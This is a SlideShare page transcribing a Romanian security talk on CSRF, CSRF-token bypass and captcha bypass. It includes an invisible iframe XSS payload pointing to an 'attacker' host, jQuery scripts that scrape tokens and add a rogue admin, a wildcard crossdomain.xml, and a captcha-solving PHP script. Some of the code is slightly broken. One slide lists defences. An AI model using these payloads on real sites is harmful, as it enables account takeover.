Cross Site Request Forgery Attacks
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Cross Site Request Forgery Attacks

on

  • 2,285 views

 

Statistics

Views

Total Views
2,285
Views on SlideShare
1,011
Embed Views
1,274

Actions

Likes
0
Downloads
21
Comments
0

4 Embeds 1,274

http://defcamp.ro 1206
http://defcamp.com 42
http://r3vyk.info 24
http://lanyrd.com 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Cross Site Request Forgery Attacks Presentation Transcript

  • 1. Cross Site Request Forgery Attacks Security token bypass Captcha bypass Presented by Vlad Horatiu [email_address]
  • 2. Ce este CSRF
  • 3. Context
    • Dispunem de:
      • Acces la un web site pe care victima il poate frecventa
      • Cross Site Scripting (XSS) in domeniul in care victima avea privilegii superioare
  • 4. Principiul de baza
    • Victima acceseaza site-ul in care avem acces
    • Prin intermediul javascript, victima trimite requesturi catre locatia in care are acces, prin intermediul XSS.
  • 5. De ce avem nevoie de XSS?
    • Browserele moderne permit requesturi AJAX, intrucat si accesul la sursa HTML a unei pagini, doar atata timp cat atat request-ul, cat si target-ul sau sunt pe acelasi domeniu.
    • Aceasta protectie restrictioneaza doar accesul la sursa unei pagini de pe alt domeniu, nu are niciun impact asupra accesarii sale (ex: iframe)
    • De ce?
      • Securitate
      • Implicatii in web advertising
      • Securitate
  • 6. Initierea atacului
    • Iframe din site-ul cu acces catre cel cu xss
    <html> <iframe src=&quot;http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>&quot; width=&quot;50&quot; height = &quot;50&quot; style=&quot;filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;&quot;> </iframe> </html>
  • 7. Login check function check() { $.get(&quot;login.html&quot;, function(data){ if(data.indexOf('blanaa') != -1) { var logged = tryToLogin(); } else { var logged = true; } }); }; function tryToLogin() { $.get(&quot;login.html&quot;, function(data){ $('#form_frame').contents().find('form').submit(); return (data.indexOf('blanaa') != -1); }); }
  • 8. Token bypass
    • URL atac CSRF clasic:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
    • Link valid in cazul unei protectii token:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
    • Code snippets (PHP):
      • Generare token:
        • mysql_query(“INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES (‘”. Intval($uid) .”’, ‘”. sha1(mt_rand(1000000, 9999999).microtime(true)) .”)’);
      • Validare token:
        • $query = mysql_query(“SELECT `user_token` FROM `user_tokens` WHERE `id` = ‘”. Intval($uid) .”’ LIMIT 1”);
        • $token = getQueryToken($query);
        • if($_COOKIE[‘token’] != $token)
          • Die(‘Esti un bulangiu!’);
  • 9. Token bypass
    • Javascript token crawler
    function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween('&token=', '&', data); alert(token); $.get(&quot;http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token&quot;+token, function(data){ }); }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  • 10. Token bypass
    • Javascript token crawler (POST)
    function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween(&quot;type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;&quot;, &quot;&quot;&quot;, data); $.post(&quot;http://victimsite.com/admin/add_user.php&quot;, { user: &quot;1337hacker&quot;, pass: &quot;pwned&quot;, token: token }, function(data) {}) }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  • 11. Token bypass
    • Metode de prevenire
      • Protectie impotriva atacurilor XSS
      • Cerere de captcha la operatiunile cu grad mare de risc
      • Cerere de parola la operatiunile cu grad mare de risc
      • Folosirea Private Browsing
      • Setarea sesiunilor cu o data de expirare relativ mica
      • Scrierea token-ului intr-un mod greu de parsat de catre script (exemplu: prin intermediul unui javascript obfuscat)
  • 12. Token bypass
    • Dezavantaje
      • Sensibil la schimbarile structurii HTML
  • 13. Flash Cross-domain policy
    • Ne permite sa facem requesturi ajax intre doua domenii diferite
    • Domeniul destinatie trebuie sa aiba domeniul sursa intr-un “whitelist”: crossdomain.xml
    • Exemplu de crossdomain.xml:
    <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy>
  • 14. Captcha bypass
    • Context
      • Userul are campurile username si password completate, datorita autocomplete
      • Formularul de logare cere captcha verification
    • Principiul de baza
      • Preluarea image path-ului prin javascript
      • Trimiterea imaginii catre un script de captcha breaking (prin intermediul crossdomain.xml)
      • Trimiterea informatiilor de logare
  • 15. Captcha bypass
    • Captcha breaking script snippet:
    $rand = sha1(mt_rand(1000000, 9999999).microtime(true)); if(isset($_GET['path']))   file_put_contents($rand.'.jpg', file_get_contents($_GET['path'])); if ($captcha = $client->upload($rand.'.jpg')) {     echo &quot;CAPTCHA {$captcha['captcha']} uploadedn&quot;;     sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);     if ($text = $client->get_text($captcha['captcha'])) {         echo $text;         } else {         $client->remove($captcha['captcha']);     echo '0';     } }
  • 16. Captcha bypass
    • Dezavantaje
      • Timpul ridicat de rezolvare a captcha-ului
        • Pentru ca metoda sa mearga, userul ar trebui sa ramana pe pagina cel putin un minut
      • Costul ridicat al rezolvarilor captcha
      • Schimbarile in structura HTML
      • Necesitatea existentei Flash Player in sistemul victimei
  • 17. Exemple concrete
    • Adaugare utilizatori intr-o platforma Wordpress
    • Adaugare user MySQL
  • 18. Intrebari